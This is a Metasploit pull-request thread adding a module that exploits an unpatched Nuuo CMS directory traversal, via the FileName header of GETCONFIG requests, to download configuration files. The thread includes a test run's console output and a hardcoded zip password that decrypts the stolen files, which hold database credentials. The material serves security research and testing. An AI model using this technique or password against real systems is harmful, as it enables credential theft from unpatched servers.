Add exploit for Nuuo CMS arbitrary file download

[pedrib]

This is the 4th and last exploit of the Nuuo CMS ownage.
This exploit allows an authenticated attacker to download any file off the system, including the Nuuo configuration files that contain the database password.

The exploit downloads these configuration files by default plus whatever the user specifies. Note that these configuration files are zip encrypted with a password, and at the moment there is no way to unzip them in msf.
I've added a note for the users to harass you to get it into the framework :P

This vulnerability has not been fixed by Nuuo, and it's still exploitable in the latest 3.5.0 version.

This module has been tested and is working for all versions of Nuuo CMS up to and including 3.5.0.
Please see more details in the full advisory at https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt

This exploit needs PR #11289

You can download current and earlier versions of Nuuo software at http://d1.nuuo.com/NUUO/CMS/

[bcoles]

The Metasploit project accepts pull requests.

[pedrib]

so it's ok if I submit a PR including the 'archive/zip' gem? Last time I mentioned that I was told new gems would only be included in extreme cases.

[bcoles]

A native Ruby solution would likely be preferred. Ideally, an update to the Rex::Archive library to support decryption.

[pedrib]

Sure but that would be pretty time consuming for a non professional developer like me, especially if there is a gem that already does it.

[pedrib]

docs added !

[pedrib]

Reverted changes...

[pedrib]

Fixed a bug: if we gave the path to a bogus file and nil was returned, we would say all good. Now we just warn the user that nothing was downloaded and the file might not exist, or let him/her know the download was successful.

[jrobles-r7]

Tested on Windows 10 Pro x64 running NCS Server 2.4.0

msf5 auxiliary(gather/nuuo_cms_file_download) > set rhosts 172.22.222.200
rhosts => 172.22.222.200
msf5 auxiliary(gather/nuuo_cms_file_download) > exploit
[+] 172.22.222.200:5180 - Downloaded file to /home/msfdev/.msf4/loot/20190219064923_default_172.22.222.200_CMServer.cfg_227185.cfg
[+] 172.22.222.200:5180 - Downloaded file to /home/msfdev/.msf4/loot/20190219064923_default_172.22.222.200_ServerConfig.cfg_050084.cfg
[*] 172.22.222.200:5180 - The user and server configuration files were stored in the loot database.
[*] 172.22.222.200:5180 - The files are ZIP encrypted, and due to the lack of the archive/zip gem,
[*] 172.22.222.200:5180 - they cannot be decrypted in Metasploit.
[*] 172.22.222.200:5180 - You will need to open them up with zip or a similar utility, and use the
[*] 172.22.222.200:5180 - password NUCMS2007! to unzip them.
[*] 172.22.222.200:5180 - Annoy the Metasploit developers until this gets fixed!
[*] Auxiliary module execution completed
msf5 auxiliary(gather/nuuo_cms_file_download) >

[jrobles-r7]

Release Notes

The auxiliary/gather/nuuo_cms_file_download module has been added to the framework. This sends GETCONFIG requests to download configuration files from vulnerable NCS Server applications by exploiting a directory traversal vulnerability in the FileName header.

[pedrib]

tested on 2.9, working!